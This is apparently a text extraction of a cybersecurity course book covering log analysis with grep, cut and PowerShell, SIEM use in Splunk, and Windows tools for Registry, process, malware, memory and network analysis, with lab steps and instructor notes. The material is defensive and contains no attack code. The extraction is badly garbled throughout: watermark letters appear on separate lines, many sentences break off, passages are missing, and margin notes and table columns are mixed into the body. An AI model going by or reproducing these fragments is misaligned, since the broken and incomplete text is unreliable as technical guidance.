The Write-Host cmdlets function similar to echo by printing the given text to the PowerShell
window. The Get-EventLog cmdlet line searches the Security event log for the latest five entries
tr
that match an instance ID of 4625—the logon failure code. The time the event was logged and a
brief descriptive message are then output to the log-fail.txt file.
is
D
or
e
at
lic
up
Figure 8-9: The previous script runs and the output is displayed.
D
Additional Log Analysis The following table describes some additional tools that could round out your log analysis toolkit.
Tools
N
Tool Description
geared toward modifying and extracting data from files or data streams,
which can be useful in preparing data for analysis. Programs and scripts
D
Tool Description
Simple Event SEC is a lightweight tool that runs as a single process that monitors a
Correlator (SEC) stream of events. It can detect and act on event patterns, producing
output through external programs such as snmptrap or mail, writing out
files, sending data to servers, calling pre-compiled Perl® scripts, and so
forth.
Microsoft Log Parser This command-line tool, targeted toward Windows logs and available as a
e
free download from Microsoft, provides a querying capability for
Microsoft log files and Registry entries, as well as XML, comma-separated
ut
values (CSV), and other common formats.
Logwatch Logwatch is a customizable log analysis system available for free
ib
download. This utility parses system logs and creates a report on various
aspects that you specify. Multiple configuration sources, including various
configuration files and command-line arguments, help to support scripted
tr
automation. Logwatch has a plug-in interface that enables you to
customize it to your needs.
is
Kiwi Syslog® Server Kiwi Syslog Server is a Windows-based proprietary log management
platform that collects Linux syslog and Windows event log data from a
D
variety of different networking and host-based appliances. It can also
generate alerts based on the log data it receives, and it can be configured
to take action on these alerts. Kiwi Syslog Server is essentially a
Visualization tools
organizations. or
lightweight version of a SIEM that is best used in small and mid-size
Visualization tools can help you identify patterns in your logging data
e
much more easily than scanning columns of text and numbers. Charts
at
(potentially with animation) make it easier to see trends and outliers, and
anomalies over time. SIEMs or other log analysis tools often include
integrated charting and visualization tools, or you can create your own
lic
charts from logging data using tools such as gnuplot, the Python
Matplotlib library, the Google Charts application programming interface
(API), Tableau, and Microsoft Excel®.
up
Big data analysis tools Big data tools such as Google BigQuery and Apache™ Hadoop® can be
useful platforms for developing your own analysis tools. Third-party
cloud-based apps also provide log analysis services.
D
All the tools mentioned in this topic can help you shape logs and extract useful information from Long Tail Analysis
them. However, the usefulness of any tool is dependent on the user's aptitude. While you may have
N
taken care to tune your logs to eliminate as much noise as possible, you'll never produce the perfect
log. That's why, during the analysis phase, you'll need to do some additional manipulation to get
your logs to report on the most valuable information possible, while suppressing irrelevant events.
o
One powerful method for separating the signal from the noise is long tail analysis.
In its original context, the "long tail" is a property of statistical distributions in which a high
D
population dominates initially, but then "tails off" into a low population. This has been applied to a
retail business context in which a small set of unique items is sold in large quantities, compared to a
large set of unique items sold in small quantities (the long tail). Its application in a security context
has been simplified: long tail analysis is the process of culling low-frequency events to identify
anomalies.
Long tail analysis starts from the assumption that one unique event in a sea of thousands is more
likely to be relevant to a security analyst than a common event that has numerous entries. In other
words, the more common an event is, the less useful it is—and the less common an event is, the
more useful it is. This is not universally true, and there are some exceptions, but for the most part, a
low-frequency event can indicate anomalous behavior that you'll want to examine.
Consider a simplified version of the previous example of the Get-EventLog command in
PowerShell:
Get-EventLog -LogName Security -InstanceId 4625
e
This will retrieve all logon failure events in the log. In a log where thousands of people are logging
on every single day, this could end up retrieving an overwhelming amount of data. Instead, you
ut
could take a step back and first identify what instance IDs are actually useful to you. To do that, you
can sort the log by how many entries are logged for each instance ID:
ib
Get-EventLog -LogName Security | Group-Object -Property InstanceId -NoElement
| Sort-Object -Property Count
The truncated result might be something like the following:
tr
Count Name
is
----- ----
1 4740
5 4698
D
5 4699
21 4661
...
4302
13801
63906
4625
4624
4558
or
e
From this result, you might choose to focus on examining events 4740 (a user account was locked
out), 4698 (a scheduled task was created), and 4699 (a scheduled task was deleted). These events are
at
much less common and may indicate suspicious or unwanted behavior—more so than the general
logon failure event (4625) would.
lic
Guidelines for Using Use the following guidelines when analyzing logs on Linux and Windows systems.
Linux- and Windows-
Based Tools for Log Use Linux-Based Log Analysis Tools
D
Analysis
Follow these guidelines when analyzing logs on a Linux system or analyzing logs from a Linux
system:
ot
• Ensure that you know the format of common Linux logs, like the syslog.
• Use grep when you need to search for specific strings in a log file, like a particular source or
N
event ID.
• Consider the different options available for grep, like ignoring case sensitivity and searching for
discrete words.
o
e
• Use WMIC and the NTEVENT alias to pull logs from a remote computer.
• Use Event Viewer's graphical interface to filter logs and create custom views for you to monitor.
ut
• Use Windows PowerShell scripts to automate the task of retrieving log file information.
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D
ACTIVITY 8-1
Analyzing Linux Logs for Security Intelligence
e
You'll be working in your Kali Linux virtual machine (VM).
ut
Activity: Analyzing Linux
Logs for Security Scenario
Intelligence
In order to examine your organization's Linux logs, you decide to use both the grep and cut
ib
commands to find specific information and make that information more readable. This will make
your log analysis efforts more efficient.
tr
Verify the logs in your Linux log folder.
is
1.
a) On your Kali Linux VM, open a terminal.
D
Consider pointing out b) Enter cd /var/log
the location of log files This is the primary log folder for Linux.
varies from distribution c) Enter ls
to distribution.
2.
of these logs. or
Note the variety of logs in this folder. You can use the commands in this activity to search any or all
This is an extremely useful tool for searching any file, not just logs.
b) Scroll through the grep manual until you return to a prompt.
lic
e
ut
ib
tr
is
D
or
This shows all instances of the word "root" in the syslog file. You can search for any text string in
e
any file this way.
at
3. How would you use grep to look for a negative match for a pattern rather than
D
a positive match?
A: The -v flag does a negative match.
ot
This command displays the first 15 characters of each log item in the file. In most cases, it includes
the date and time of each log item.
b) Enter sudo cut -c16-35 syslog
o
This command displays characters 16 to 35, which generally include the source of each log item
(e.g., the kali host), as well as the process/application that made the log entry. Of course, the
D
length of each field affects what gets printed, so you'll want to use a more elegant way to retrieve the
desired information.
e
ut
ib
tr
is
D
or
The -f flag enables you to search by fields. In this case, the first three fields are displayed. The -d
e
flag enables you to specify what separates (delimits) each field. In this case, the fields are separated
by a colon, which produces the date, time, source, and process/application.
at
A: Answers will vary, but major delimiters include space, tab, period, and comma.
a) Enter sudo grep -i "error" syslog* | cut -d " " -f1-5 Ensure that students are
placing a space between
the quotes in this
command.
If no error events are
found, consider having
students use terms like
"warning" or "critical"
instead.
e
ut
ib
tr
is
D
or
You can use the pipe (|) character to link Linux commands together. This command shows the first
e
five fields, delimited by spaces, of the syslog entries that include the word "error" (case insensitive).
at
How would you identify warnings in this log? test this command. The
same command could
A: Answers may vary, but it would be something like sudo grep -i "warning" syslog.1 | be executed on the main
cut -d ":" -f1-3 log file, however.
up
D
ot
N
o
D
TOPIC B
Use SIEM Tools for Analysis
SIEM deserves particular mention, as it's one of the most powerful log analysis tools available to
you. A properly configured SIEM can provide you with incredible insight into your security
intelligence.
e
ut
Security Intelligence Correlation
Security Intelligence Taken in combination, events that seem completely valid and proper on their own may reveal a
ib
Correlation security problem. For example, your virtual private network (VPN) logs show that Jane Doe, one of
your sales representatives who regularly travels to Asia, has logged in to your network from a
location in Beijing. Moments later, your radio frequency identification (RFID) physical security
tr
logging system shows that Jane has swiped her ID card at the front door of your corporate office in
Rochester, NY. While neither of these events would individually show up as an anomaly, combined
is
they provide good evidence that you have a security problem.
D
Security Information and Event Management (SIEM)
Security Information and Security information and event management (SIEM) solutions provide real-time or near-real-
Event Management
(SIEM) or
time analysis of security alerts generated by network hardware and applications. SIEM technology is
often used to provide expanded insights into intrusion detection and prevention through the
aggregation and correlation of security intelligence. SIEM solutions can be implemented as software,
e
hardware appliances, or outsourced managed services.
SIEM products are excellent tools that can help an organization streamline its network security
at
administration. Productivity in the areas of log analysis and auditing network systems is likely to
increase, as SIEM solutions will help administrators more easily identify problems that would
lic
otherwise take them a very long time to detect. This is especially crucial in responding to a security
breach where every second counts.
The effective deployment of a SIEM program involves the following considerations:
up
• The SIEM solution should log all relevant events and not be cluttered with irrelevant data.
• Establish and clearly document the scope of events. This will help you support the previous
bullet point.
D
• Schedule regular reviews of logs so you don't miss any important events that have escaped alerts.
• Provide auditors and forensic analysts with a trail of evidence to support their duties.
N
SIEM Analysis
o
SIEM Analysis In many cases, intelligence loses value over time. So, the intelligence that you capture and analyze in
real time or near real time would be the most valuable. In some cases, such timely intelligence might
D
enable you to limit or completely avoid the damage resulting from an attack. But gathering and
analyzing security intelligence takes a lot of effort. Many tedious tasks are involved in the process:
identifying relevant data, collecting it, transforming it into a useful form, aggregating different
sources and correlating them, analyzing the correlated data to find patterns that are significant for
security, and finally identifying actions you should take in response to those significant security
patterns. SIEMs are intended to automate much of the process of gathering and analyzing security
intelligence, improving its timeliness.
e
ut
ib
tr
is
D
or
e
Figure 8-10: SIEM's presence in the security intelligence lifecycle.
at
As shown here, SIEMs can be configured to automate much of the security intelligence lifecycle,
lic
predominantly in the collection and processing phases. SIEMs can even automate some of the tasks
involved in analysis, production, and dissemination. Of course, a lot of planning and configuring is
required to enable a SIEM to accomplish these tasks. SIEMs can help with some of the planning
and direction phase by providing templates, discovery features, and other functions. Even though a
up
SIEM can automate numerous tasks, there are still significant gaps that require human intervention,
including dissemination and integration, planning and direction tasks, and of course, analysis.
To some extent, some of your analysis work can be reduced through careful planning and direction
D
on the front end of the lifecycle. For example, in the process of evaluating what information you
will collect to meet your security and compliance requirements, you are conducting a front-end
analysis. This process will save you (and the SIEM) significant work later on. While a SIEM could
ot
conceivably collect all the logs across your systems, this is not a good idea. It is best to configure the
SIEM to focus on the events related to security and compliance that you need to know about, which
you have already identified through your risk management analysis. Too much information can bog
N
down the work performed by the SIEM, create unnecessary network traffic, and create more work
for you when it's time to analyze information produced by the SIEM. All of these can affect the
o
SIEM Tools
Common SIEM tools include:
• Splunk®: A proprietary SIEM that has a limited free version for individuals, a paid enterprise
version, and a paid cloud-based version.
• ArcSight Enterprise Security Manager (ESM): A proprietary SIEM maintained by Micro
Focus and previously the property of Hewlett-Packard (HP).
• IBM® Security QRadar®: A proprietary SIEM.
SIEMs and AI
Modern SIEM systems incorporate artificial intelligence (AI) and machine learning capabilities that
enhance collection and correlation activities. For example, the SIEM might be able to train a
machine learning model that is able to intelligently classify useful and relevant data while also
identifying data that is not worth collecting. Likewise, the SIEM may be able to use correlations and
e
other characteristics of the data to determine when an event requires attention and what the
ut
appropriate response should be.
ib
Agent-Based vs. SIEMs typically collect data from various hosts in one of the following ways:
tr
Agentless SIEMs • Agent-based: With this approach, you must install an agent service on each host. As events
occur on the host, logging data is filtered, aggregated, and normalized at the host, and then sent
is
to the SIEM server for analysis and storage. This approach only sends required data to the
server, keeping network traffic to a minimum.
D
• Agentless: With this approach, you do not have to install and configure an agent service on each
host. The SIEM server periodically has to log in to each host it is monitoring to retrieve log
updates. Because data is not pre-processed by an agent, larger amounts of data (much of it
Although they do not provide a complete alternative to skilled (human) security analysts, some
organizations may find that these tools are a valuable addition to their security intelligence collection
e
toolkits.
at
example, a scanning tool like Nessus collects vulnerability data from devices that you've deployed its
agents to. An asset discovery and management tool like ManageEngine AssetExplorer can use
Windows Management Instrumentation (WMI) to scan devices without having agents installed on
up
them.
Guidelines for Using Follow these guidelines when using a SIEM for security intelligence analysis.
SIEMs for Security
ot
• Preserve data as required in its original forms. SIEMs generate new versions of data that may not
satisfy some compliance requirements. Be careful to preserve original logs and other data that
o
possible, to generate important alerts in a form such as support tickets, which automatically
document threats you have detected and are following up on.
• Review your logs on a frequent, regular basis.
• Ensure that SIEM monitoring can generate documentation to show your systems are frequently
scanned for threats and that logs and alerts are regularly reviewed by personnel.
e
• Configure your SIEM to identify unauthorized assets and software. By using the SIEM to
maintain your inventory of authorized assets and software, you have a reference baseline from
ut
which the SIEM can quickly identify any assets or software that are not on the approved list.
• Use the SIEM to monitor configurations of hardware and software on servers, workstations, and
notebook computers, and provide alerts when a misconfiguration is identified.
ib
• Use the SIEM to monitor configurations of wireless devices and wireless intrusions, and provide
alerts when a misconfiguration is identified.
tr
• Use the SIEM to monitor configurations of rules, policies, access control, and other
configurations on network devices such as firewalls, routers, and switches.
is
• Configure the SIEM to report on the unnecessary use of administrator privileges, such as a user
with administrative access running a web browser on a server.
D
• Correlate user activities with user rights and roles to reveal violations of least-privilege
enforcement.
• Configure the SIEM to perform continuous vulnerability assessment and remediation.
or
e
at
lic
up
D
ot
N
o
D
ACTIVITY 8-2
Incorporating SIEMs into Security Intelligence
Analysis
e
Before You Begin
ut
Activity: Incorporating You'll be using Splunk, a SIEM tool, which has been installed on your Windows Server.
SIEMs into Security
Intelligence Analysis Scenario
ib
With logs coming in from all over your network, you realize you need the centralized analysis
platform a SIEM can provide. After looking at some of the providers, you decide to test Splunk to
tr
see how well it will operate in your environment. You'll analyze your server's event logs in the wake
of the password attack you launched back in the "Analyzing Attacks on Computing and Network
is
Environments" lesson.
Ensure students
understand that this
D
activity is just a taste of 1. Sign in to Splunk.
what a SIEM can do.
Leveraging the full a) Open a web browser on your Windows Server and navigate to http://localhost:8000.
power of a SIEM
requires more complex
configuration that is
beyond the scope of this
or
b) Verify that you are automatically signed in.
e
course.
at
lic
up
D
Note: The user name is admin and the password is Pa22w0rd if you need to
sign back in for any reason.
ot
c) From the navigation pane on the left, select Local Event Logs.
e
ut
ib
tr
is
D
or
e
at
lic
Note: Notice that you can also monitor local and remote systems.
d) In the right pane, select the add all link next to the Available item(s) list.
up
D
ot
N
o
D
e) At the top of the page, select the Next button, then Review, then Submit.
f) Select the Start Searching button.
g) Verify that the search box displays a search query with the source as your Windows event log and
the host as your server's computer name.
e
h) If necessary, press Enter to run the search query.
ut
3. Run queries to search for Secure Shell (SSH) connections to your server.
a) Remove the search query and type error, and then press Enter.
ib
Note: Splunk is currently monitoring only one source (event log) and host
(your server), so you don't need to include this information in the query.
tr
b) Search for sshd 10.39.5.#, where # is your Kali Linux VM's IP address.
is
c) Verify that there are many entries for attempted SSH connections to the server.
D
or
e
at
lic
up
D
d) Search for sshd password fail* to search for SSH connection attempts that failed.
This searches for any text that includes "sshd", "password", and any text that starts with "fail". So,
ot
Note: Splunk assumes a logical AND between two terms unless otherwise
specified. In this case, Splunk will only return results that include "sshd" and
N
"password" and "fail*" in a particular event entry. You can also type OR
between each term to specify a logical OR operation.
o
4. Is there any evidence of the SSH password attack you ran in the "Analyzing
D
5. Despite the fact that you covered your tracks in the "Analyzing Post-Attack
Techniques" lesson, why do log entries concerning SSH still appear?
A: There are two reasons. The most obvious is that you used SSH after you cleared the Application
log, so any of that activity would be logged. However, there are still SSH logs from the cracking
attempt in the "Analyzing Attacks on Computing and Network Environments" lesson, as mentioned
in the previous question. This is because some SSH activity is also sent to the Security log, which
you likely didn't clear. Remember, you performed online dictionary cracking using Ncrack; it tried
and failed to connect using many different passwords before it successfully connected with the
correct password.
e
6. How would you look specifically for SSH password failures for the
ut
Administrator account that came from Kali Linux?
A: Answers may vary, but using the search query sshd pass* fail* admin* 10.39.5.# where # is the
ib
last octet of your Kali Linux IP address will work.
tr
a) At the top-left of the page, select the Search tab.
is
D
b)
c)
or
Select the Data Summary button to return to the default view of the data.
From the Data Summary pop-up, select Hosts, then select your server.
e
d) For any event listed, select the Show all n lines link to open more information about that event.
e) Select any of the fields that interest you, and then select Add to search.
at
lic
up
D
ot
N
o
D
Notice that you can continue to hone your search with this method.
f) Refine your search some more, or start over and try a fresh search. Try adding OR between your
search terms to see how that changes your output.
8. What other sources of data would you load into Splunk in the Develetech
e
network?
ut
A: Answers will vary, but should include firewall logs, intrusion detection system (IDS) logs, web
server logs, and logs from other critical systems.
ib
9. How does a system like this aid security management?
A: Answers will vary, but could include: it pulls all logs into one place for analysis and enables the
tr
massaging of data and reconstruction of events for incidents.
10.Close Splunk.
is
D
or
e
at
lic
up
D
ot
N
o
D
Summary
In this lesson, you analyzed log data by using a variety of different tools and techniques. You used
common tools available for Windows and Linux to assist in the analysis process, as well as took
advantage of the power of SIEMs. By combining these tools and techniques into a comprehensive
log analysis strategy, you'll be able to extract actionable intelligence out of your logs while
circumventing the noise.
e
Encourage students to
What are some of the tools you use most often to analyze log data? use the social
ut
A: Answers will vary. Students will likely have some familiarity with Linux, and may prefer to use tools like networking tools
grep, awk, and cut to aid them in analysis tasks. Others may need to perform analysis of Windows provided on the CHOICE
system logs and will use command-line tools like findstr or GUI tools like Event Viewer. Whatever Course screen to follow
ib
up with their peers after
they use, students will also likely see the value in scripting the use of these tools for automation—they
the course is completed
can do this through the scripting languages Bash (Unix-like) or Windows PowerShell, among others. for further discussion
tr
and resources to support
How could/does a SIEM in your organization or an organization you're familiar continued learning.
with help increase productivity in the security intelligence lifecycle processes?
is
A: Answers will vary. SIEMs provide the most support in the intelligence lifecycle in the collection and
processing phases. They can automate the collection of data from disparate sources (e.g., business
D
application logs from Windows client computers and Linux syslogs from critical servers), as well as
correlate that data so that it becomes more useful for analysis (e.g., normalizing time attributes across
logs with different formats). In some cases, students using SIEMs may be able to speed up their
or
analysis efforts if they can program their SIEM solution to spot common malicious patterns (e.g.,
repeated failed attempts at remote authentication to multiple critical servers). However, SIEMs are not
a full replacement for human analysis processes. Students may also be able to leverage a SIEM's
ability to disseminate data and integrate that data with other solutions, but again, human intervention
e
is usually necessary to round out this process.
at
Note: Check your CHOICE Course screen for opportunities to interact with your classmates,
peers, and the larger CHOICE online community about the topics covered in this course or
lic
other topics you are interested in. From the Course screen you can also access available
resources for a more continuous learning experience.
up
D
ot
N
o
D
e
ut
Lesson Time: 3 hours
ib
tr
is
Lesson Introduction
D
The analysis you perform on log data is important, but it tends to remain static. Most of the
intelligence you'll be gathering and analyzing from logs will be actionable only after the event
or
is either underway or already finished. So, to complement this static analysis, you need
something a bit more dynamic. That's why, in this lesson, you'll take a more active approach
to analyzing your organizational assets.
e
Lesson Objectives
at
TOPIC A
Analyze Incidents with Windows-Based Tools
The Windows® architecture is unique among operating systems, and requires certain tools to analyze
every dimension of that architecture. In this topic, you'll use some of the most common of these
tools.
e
ut
Registry Analysis Tools for Windows
Registry Editor The Windows Registry stores configuration information for low-level Windows processes and
ib
(regedit) services, as well any apps that choose to use it. Because low-level elements like the Windows kernel
and device drivers store settings in the Registry, it is a common target for attackers who want to
manipulate components crucial to Windows operating normally. The Registry is also used as a
tr
vector for hiding malicious app settings that aren't easily detected through manual analysis or
automated tools.
is
The default Registry editor that Windows provides is called regedit, or the Registry Editor. The
Registry Editor provides a File Explorer–like GUI for viewing the structure of the Registry.
D
Ultimately, at the end of each path in the Registry is a single entry. The format of each entry is as
follows:
or
• The key, which is similar to a folder or other container structure.
• The value, which is similar to a file in that it holds the data. Keys can have multiple values.
• The value type, which tells Windows how to parse the value's data (such as if the data is in a
string format, a binary format, etc.).
e
Keys with similar purpose or relevancy are organized into one of several hives. For example, most
at
Analyzing the Registry through regedit can reveal several things. You can search HKLM for Analysis with Registry
drivers attached to the operating system to identify unknown keys or known malicious ones. You Editor
can also search HKCU for the most recently used (MRU) files (\SOFTWARE\Microsoft
\Windows\CurrentVersion\Explorer\RunMRU) to see if any malicious entries have been made
recently by the user based on their activity. Essentially, comparing known key values to their current
values can help you identify tampering. You should especially watch the keys of processes and
applications like cmd.exe, explorer.exe, Session Manager, System Policy, and others that could
potentially grant a user control over the system. Many values have no data set, but a lack of data in a
value could also indicate it was maliciously removed.
e
One of the biggest drawbacks to regedit is that it doesn't display the last modification time of a
ut
value, despite this information actually being recorded. You need to first export the key to a text file,
which will then print the time values.
ib
Additional Registry Tools
Some third-party alternatives are available to you should regedit not be what you're looking for.
tr
For example, regdump is a tool that dumps the contents of the Registry in a text file with simple
formatting. This can help you search specific strings in the file with findstr, or, if you're analyzing
from a Linux® machine, you can use grep.
is
Autoruns is a utility that enables you to view every application and process that starts automatically
when Windows is booted. It also provides a link to the Registry keys that configure autorun
D
functionality for the relevant app or process. If malicious software or some other unauthorized
process boots with Windows, you can use Autoruns to more easily identify the compromised
Registry entries.
Since most malware resides somewhere within a host's file structure, being able to identify the
malware and assess how it behaves is crucial to removing all traces of the infection.
lic
The standard dir command, which lists all files and folders in a directory, actually has some
advanced functionality for file system analysis. The -Ax switch filters all file/folder types that match
the given parameter ( x ). For example, dir -AH displays only hidden files and folders. Malicious
up
files marked as hidden are much easier to find this way than looking through every entry, especially
if the folder contains hundreds or thousands of files. Since PowerShell is now default in Windows,
you should consider using the Get-ChildItem cmdlet and its various arguments instead.
D
For tools that specifically focus on file system analysis, you should also consider the many drive
usage tools available. These tools will typically scan a file system and retrieve comprehensive
statistics about how that system is operating, including:
ot
• Visual representation of storage space. For example, a tree map can represent a hierarchy of
folders and increase the visual size of folders depending on how much data they hold.
• A directory listing of storage space, with folders and files sortable by size, extension, number of
N
• A list of individual processes and applications and their live read/write speeds of a drive.
Applications and processes that consume too much drive capacity or too much live activity may be
D
malicious. They might be constantly running in the background, consuming too much of the
computer's storage or CPU, and slowing the computer to a crawl. Drive usage tools include:
• Task Manager
• Resource Monitor
• SpaceSniffer
• WinDirStat
• TreeSize
• DiskSavvy
e
ut
ib
tr
is
D
or
Figure 9-2: Resource Monitor displaying activity on a disk.
e
PE Explorer
at
PE Explorer is proprietary software that offers a variety of different features, including the ability to
browse the structure of 32-bit Windows executable files. The main advantage of this is you can
observe what a program is accessing, like what dynamic-link libraries (DLLs) it calls and how it
lic
interfaces with other applications on the system, as well as how it uses application programming
interfaces (APIs).
Being able to open executables like EXEs can help you determine whether or not the executable is
up
exhibiting malicious behavior. It also lets you see if any legitimate apps are calling malicious libraries
that could be affecting both the app and the system it runs on.
D
quietly in the background. An attacker who is able to hijack these processes can eavesdrop or make
unauthorized changes to a computer depending on the process's access rights. Attackers can also
N
craft malicious processes to run without the user's knowledge, which can make the task of
identifying related problems much more difficult. Although Task Manager gives the user an
overview of the running processes on the system, as well as the ability to alter those processes, there
o
Sysinternals suite of tools. Process Explorer goes beyond Task Manager and provides many more
features to help you analyze running application code. One feature includes the ability to see all the
system resources a particular process is currently reserving. If you are unable to edit or otherwise
manage a particular file, you can use Process Explorer to identify the potentially malicious process
that is using it. Likewise, Process Explorer can assist you in examining an unknown process by
displaying the DLLs it is using or the Registry entries it is tied to.
e
ut
ib
tr
is
D
or
e
Figure 9-3: Process Explorer showing the Registry keys associated with a specific process.
at
Another tool for process analysis is Process Monitor (Procmon), also offered by Microsoft as part Process Monitor
of Sysinternals. Whereas Process Explorer is better used as an advanced Task Manager, enabling you
to monitor processor and memory consumption in real time, Process Monitor is more suited toward
up
analyzing how the process interacts with the system by filtering and searching a log of process
activity data. In particular, with Process Monitor you can analyze every operation a process has
undertaken (including Registry key usage), the status of that operation, and any additional input/
output detail of that operation.
D
You can also analyze each operation's thread stack to find its root cause. For example, if an
application is attempting to access a file that doesn't exist, you can review the stack to see if any of
ot
the modules there seem out of place with regard to what the application should or should not do. A
malicious DLL, for instance, could be interfering with the process's normal execution.
N
o
D
e
ut
ib
tr
is
D
or
e
Figure 9-4: Filtering logged process data using Process Monitor.
at
Command-Line Tools
There are also a few Windows-based command-line tools that offer similar functionality to the
lic
previous GUI tools. An older tool is tlist, which displays process information like its memory
usage, the state of running threads, a process tree, and individual operations for each process. The
tlist tool was replaced by tasklist, which offers most of the same functionality.
up
Service Analysis Tools Although processes can run without any overt sign to the user, Windows services are almost always
for Windows designed to run in the background without directly interfering with the current user's desktop
session. This essentially makes services a type of non-interactive process. Malware that installs itself
ot
as a service can effectively hide itself from manual detection, and may even be able to escape the
notice of traditional anti-malware scanners. There are some tools that can help you identify
suspicious service activity, however.
N
You can view running services in Task Manager, but Windows also comes with a Microsoft
Management Console (MMC) snap-in simply called Services.msc. This snap-in provides a list of all
o
active services, as well as details of each service, including a description of what it does. It also
enables you to start or stop a service. You can also view and enable/disable services from the
D
Services tab of the MSConfig utility, though this provides you with less detail about each service.
The shell command net start is another way to display all running services on the computer—this
lists their names without any further detail. The equivalent command in PowerShell is:
Get-Service | Where-Object {$_.Status -eq "Running"}
Although these tools can help you identify an unknown or suspicious service running on the
computer, they aren't particularly complex. A tool with a little more robust feature set for analysis is
the Windows Task Scheduler. Task Scheduler not only enables you to create new tasks to run at
predefined times, but it also records the status of certain services. The properties dialog box of each
task includes a History tab that provides details of every time the service was started or stopped or
when it completed a particular action. This is essentially a version of Event Viewer for that one task
—you can see the time each action was recorded, its event ID, what kind of action it took, and
more. If a system service is acting strangely due to malicious tampering, you may be able to more
easily analyze its behavior using Task Scheduler. Task Scheduler may also be able to capture the
history of non-system services, like malware that installs itself as its own service.
e
ut
ib
tr
is
D
or
e
at
lic
up
Although many of the previously mentioned tools can help you detect malware, specialized software Malware Analysis Tools
is required to actually analyze how malicious software functions and operates on a target system. for Windows
ot
These tools can range from being relatively simple to operate, like malware scanners, to very
complex, like disassemblers. If you're interested in taking a deep dive into the inner workings of
N
presence of malware and can take action in response to detecting malware, like removing or
D
quarantining it. Anti-malware solutions can include everything from end-user software (often
called "antivirus" software, even though they can detect other types of malware) to more robust
enterprise solutions (e.g., endpoint detection and response [EDR]). Anti-malware solutions are
often the most basic line of defense against malware, though they are not the most thorough or
effective. Examples include:
• Windows Security (also known as Microsoft Defender)
• Malwarebytes Anti-Malware
• Avast
• AVG
• Crowd-sourced signature detection services. Some websites have been set up to receive
signature information from people and organizations, and then compile that information into a
public database. You can upload a file to the site, which analyzes the file for known malicious
signatures. The site might also show which anti-malware solutions mark the file as malicious
versus those that do not. The benefit of crowd sourcing signature detection is that security
professionals can collaborate to identify new malware as it arises rather than just relying on a
single source of information. Examples include:
e
• VirusTotal (https://www.virustotal.com)
ut
• Hybrid Analysis (https://www.hybrid-analysis.com)
• Malware sandboxes. Sandboxing is a technique that isolates untrusted data in a closed virtual
environment to conduct tests and analyze the data for threats and vulnerabilities. Malware
ib
sandboxes are common environments from which security practitioners examine malware and
how it operates without threatening actual hosts or the wider network. Examples include:
tr
• Cuckoo Sandbox
• VirtualBox
is
• VMware
• Hyper-V
D
• Static malware analyzers. Various tools can provide a deeper look into malware than just a
signature. One common static analysis technique is to look for strings within a malware's
executable file. In this case, a string is any sequence of encoded characters that appears within
or
the executable file. So, a string analysis can reveal everything from variables the program is using
to API calls, and more. These strings may help you identify the nature or function of the
malware. Examples include:
e
• Strings
• findstr
at
to examine its base structure can provide you with information as to how the malware
propagates, what its primary directives are, and where it originated from. One of the most
common methods of reverse engineering is disassembly. A disassembler performs the reverse
engineering process of translating low-level machine language code into higher level assembly
up
• WinDbg
ot
Analysis Tools for long. Data temporarily written to RAM may be gone a fraction of a second after it's written, which
Windows makes analysis of RAM difficult and complex. So, you'll need to use tools to image the memory for
Volatile data collection is static analysis. However, even the process of running a memory imaging tool can overwrite crucial
o
discussed in more detail RAM sectors, so you should seek out tools that leave a very small memory footprint as part of their
in the forensics lesson. execution. Some volatile memory imaging tools include Belkasoft Live RAM Capturer, MAGNET
D
Proprietary tools with this functionality include Belkasoft Evidence Center X and Forensic Toolkit.
Some freeware alternatives include WinDbg and Volatility. Volatility, in particular, has many
different modules for analyzing specific elements of memory. If you only want to retrieve a list of
DLLs used by processes in memory, you can run the dlllist module; if you want to see a history
of commands run at the command prompt, you can use the cmdscan module; and so on. Volatility
also has a GUI version called Volatility Workbench.
e
ut
ib
tr
is
D
or
e
at
Figure 9-6: Using Volatility Workbench to analyze DLL history from a memory dump.
lic
Attackers targeting a Windows Active Directory® (AD) system may try to elevate access, create new Active Directory Analysis
users, delete users, or use techniques like the golden ticket to exploit Kerberos. There are many tools Tools
that can supplement the standard Active Directory MMC snap-ins by providing you with greater
monitoring and summary information so you can detect such attacks. For example, Active Directory
D
Explorer can list all objects within an Active Directory domain, as well as display the attributes for
each object in a detailed list. You can use Active Directory Explorer, available from the Sysinternals
suite, to examine what date and time an account was last changed; when the account's password was
ot
last set; when the account was last logged on/off; and so on. This information can help you identify
unusual behavior or attributes that are configured with suspicious values.
N
o
D
e
ut
ib
tr
is
D
Figure 9-7: Analyzing the attributes of an account using Active Directory Explorer.
or
Additionally, ManageEngine offers a full suite of freeware Active Directory tools called ADManager
Plus. The suite enables you to run queries on your Active Directory structure so that you can find
the values you're looking for; reports the last logon times of domain users; reports user accounts
with empty passwords; includes a password policy manager; and much more. Being able to retrieve
e
crucial summary information about the accounts and other objects in your domain will help you
identify anomalies and potential Active Directory–related incidents.
at
Network Analysis Tools Aside from performing analysis on specific hosts, you can actively analyze your network
for Windows infrastructure using various tools available for Windows, many of which come with the OS by
up
students how they apply Wireshark As you've seen, Wireshark is a powerful packet analyzer. It can easily
to network analysis reveal to you anomalous behavior that may suggest an incident is taking
rather than go into detail. place. Excessive packets sent from many sources to one destination could
ot
Nmap® Nmap is another tool you've seen in action, but mostly from a
D
reconnaissance point of view. Nmap can also aid you in analyzing your
network by enumerating hosts. With enumeration, you can identify any
rogue or otherwise unknown hosts attached to and transmitting on your
network. You can also use Nmap to test how well your network firewalls
and other defenses are able to block Internet Control Message Protocol
(ICMP) and other types of traffic that Nmap uses to scan hosts.
e
Datagram Protocol (UDP), and you can configure them in a number of
ut
ways, including the size of UDP datagrams. Measuring bandwidth on the
network can help you spot trouble areas where actual throughput is
slower than acceptable levels, impacting your network's availability.
ib
ipconfig This command enables you to view IP address and Domain Name
System (DNS) information on a host. This is a quick and easy way to get
tr
the networking information of a host you have access to. This is essential
in taking inventory of known hosts to compare against any unknown
hosts discovered in network enumeration. If a legitimate host has been
is
compromised, you can also use ipconfig to see if its networking
information has been altered, like its DNS lookup pointing to a malicious
D
server rather than the organization's. This command comes with
Windows.
netstat
or
Like ipconfig, this command can be used as a diagnostic tool to check a
host's network information. In the case of netstat, it displays all
network connections that the host is currently listening to. It provides
information about the protocol used, the local host's address, the address
e
it's listening to, and the state of the connection (as defined by RFC 793).
Using this command can help you identify unknown or malicious sockets
at
a host is connected to, as well as any errors in its routing tables. This
command comes with Windows.
lic
TCPView This tool is part of the Sysinternals suite and shows information similar to
netstat, but in a GUI. It also provides additional information about
network connections, including creation time, number of sent packets,
up
information. Aside from local retrieval, you can also retrieve NetBIOS
information from a remote host with the -a or -A flags. NetBIOS
information can help you map a network by viewing a host's computer
ot
